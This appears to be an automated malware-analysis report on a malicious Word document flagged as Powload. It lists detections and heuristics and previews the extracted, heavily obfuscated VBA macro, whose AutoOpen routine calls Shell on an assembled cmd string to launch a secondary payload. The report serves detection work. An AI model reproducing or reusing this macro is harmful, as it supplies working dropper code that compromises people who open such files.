MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell function to execute a complex, obfuscated command string. The presence of the AutoOpen macro and the use of Shell indicate an attempt to download and execute a secondary payload, a common technique for malware delivery.
Heuristics 5
-
ClamAV: Doc.Malware.Powload-6775735-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6775735-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12582 bytes |
SHA-256: 6f05538252e349eec817800cbca305d9a7d3e1f015e09d20a152ea859042c07b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tUYtrEjMQimj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Rnd(58075 - aramO + 33705 + dRwEA)
TypeName Hex(56683 / jGiWz * wqMLEt / wnwfUh)
TypeName Sin(BmtETP)
TypeName Cos(61991 / 82258 - MMfUju - pjiYp)
Shell@ KeyString(vbKeyC) + GjfRkQHb + OQJjlNYb + azFJYQMIISH + sZHBKX + QhlnuWFPNOl + YrmOMnYWrm + nXTVzr + EQrSGWHbvG + zGFMWfkpLqQ + cXaAAoBhdF + vCOtHdth + BNwfkfY + QKWTmQjNVUcj, 194733338 - 194733338
TypeName ChrW(8122)
TypeName CDbl(80)
End Sub
Attribute VB_Name = "MmiINbf"
Function azFJYQMIISH()
On Error Resume Next
TypeName 80
TypeName zKUsf
TypeName tMUcq
KAJGzXm = "md " + "/" + "V:/" + "C" + CStr(Chr(QotNIrinN + dRkEUYub + 34 + jcwwuifiUNLVjm + HSBMiWb)) + "s"
TypeName Sgn(784)
TypeName Rnd(2)
TypeName ChrW(22720 + zziOqV)
sYaDp = "e" + "t" + " -" + " " + " " + "=" + "oRu"
TypeName Round(762)
TypeName Sin(wGNZY)
TypeName 277419199
FraLzYMOn = "B" + "Y" + "QO" + "Z" + "iB"
TypeName Cos(EKwiGC - 49061 / 47893 + OOiGP)
TypeName CInt(63734 * azQOQ / sJrGAa + 13080)
WJuTiMdId = "ROk" + "EU" + "iNZ" + "P" + "ZV" + "Y" + "rG" + "rb" + "dS"
TypeName CDbl(PdiToW / ztjUW)
TypeName CInt(tBKzj)
TypeName CDate(31535 * 50540 - 15820 + aqABw)
jDjslESQlv = "mD" + "0" + "qv" + "a\" + "fhc" + ";X." + "} " + "5Cg" + "W"
TypeName ljFKvV
TypeName CSng(1953)
TypeName ChrW(81273288)
zCktjkPjpi = "wL" + "t" + "F" + "/{y" + ":n" + "x" + "$-" + "+6" + "," + "s" + "eA" + "=" + "Kl7"
TypeName CDbl(38101233)
TypeName CBool(XFkCtP - ZvuXwT)
ZdYNF = "p)J" + "'" + "(@j" + "&&" + "fo" + "r %" + "A i" + "n" + " (6" + "9"
TypeName Int(otilwf)
TypeName CInt(TvTrks)
TypeName 595
fusUciEMza = ";" + "0;" + "47;" + "63;" + "24;" + "62;" + "36;" + "6" + "3" + ";"
TypeName Sqr(424)
TypeName CByte(87)
TypeName Sqr(nGmLMw)
fJsPurYD = "67;" + "67;" + "4" + "2" + ";" + "57;"
TypeName ChrW(MBYdX - 9908)
TypeName CByte(407)
TypeName nNnREV
NfiprYqVVEU = "27;" + "66;" + "1" + "2" + ";6" + "5" + ";5" + "5;6" + "3;" + "47" + ";58" + ";"
azFJYQMIISH = KAJGzXm + sYaDp + FraLzYMOn + WJuTiMdId + jDjslESQlv + zCktjkPjpi + ZdYNF + fusUciEMza + fJsPurYD + NfiprYqVVEU
TypeName 3
TypeName CByte(4)
End Function
Function sZHBKX()
On Error Resume Next
TypeName Sqr(ilMdz)
TypeName ChrB(WINjEM)
TypeName 53
iuTjzL = "0" + ";2" + "5" + ";75" + ";63" + ";37"
TypeName CBool(IlGLw - DWBRIZ + 3911 - mqrDo)
TypeName CStr(9)
TypeName Sgn(KvnGB / JUdoV)
nYtGzDOUZ = ";49" + ";" + "42;" + "1" + "6;" + "63" + ";" + "4" + "9" + ";40" + ";46"
TypeName 717
TypeName CByte(226945093)
TypeName Fix(81727 * LfdiK * 85136 * FjvrHj)
XLBzq = ";" + "63;" + "25" + ";4" + "4;6" + "7" + ";" + "15;" + "63;" + "55;" + "4"
TypeName Sin(93417 - pSEvhu - Xcnwa * 18512)
TypeName Oct(413523989)
TypeName Round(jsIOq)
jzNZFA = "9;3" + "8" + ";5" + "7" + ";" + "64" + ";75" + ";28" + ";" + "6" + "5"
TypeName Sgn(185541721)
TypeName CInt(ARFSMu)
TypeName CStr(449)
aijrUj = ";7" + "2" + ";36" + ";" + "49" + ";" + "49;" + "69;" + "54" + ";51" + ";51"
TypeName 291832683
TypeName FXFQw
TypeName PLHImz
KzvCRWk = ";47" + ";4" + "7;4" + "7" + ";40" + ";0" + ";5" + "5" + ";" + "63;" + "37;"
TypeName Log(5)
TypeName CBool(kFFwmd)
TypeName Atn(bpdRJs + AmcabJ)
RjHYvPDoL = "2;2" + "5" + ";63" + ";1" + "5" + ";2"
TypeName Hex(77171 + 56298 - 87083 + SSFqZ)
TypeName 397647981
TypeName 7611225
SrJzGEJDfSB = "6;6" + "3" + ";3" + "3;6" + "2;4" + "0;3" + "7;" + "0"
TypeName TuBmW
TypeName Oct(JzCPMl)
SihqpztBFi = ";28" + ";5" + "1;" + "19;" + "2" + "5;2" + "6;" + "7" + "4"
TypeName Jaavmw
TypeName CByte(VJJjn)
TypeName 9
bRrXiRNiEs = ";" + "3" + "6;" + "49;" + "49;" + "69" + ";" + "5"
TypeName CLng(qThYp)
TypeName CSng(TCqbd /
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.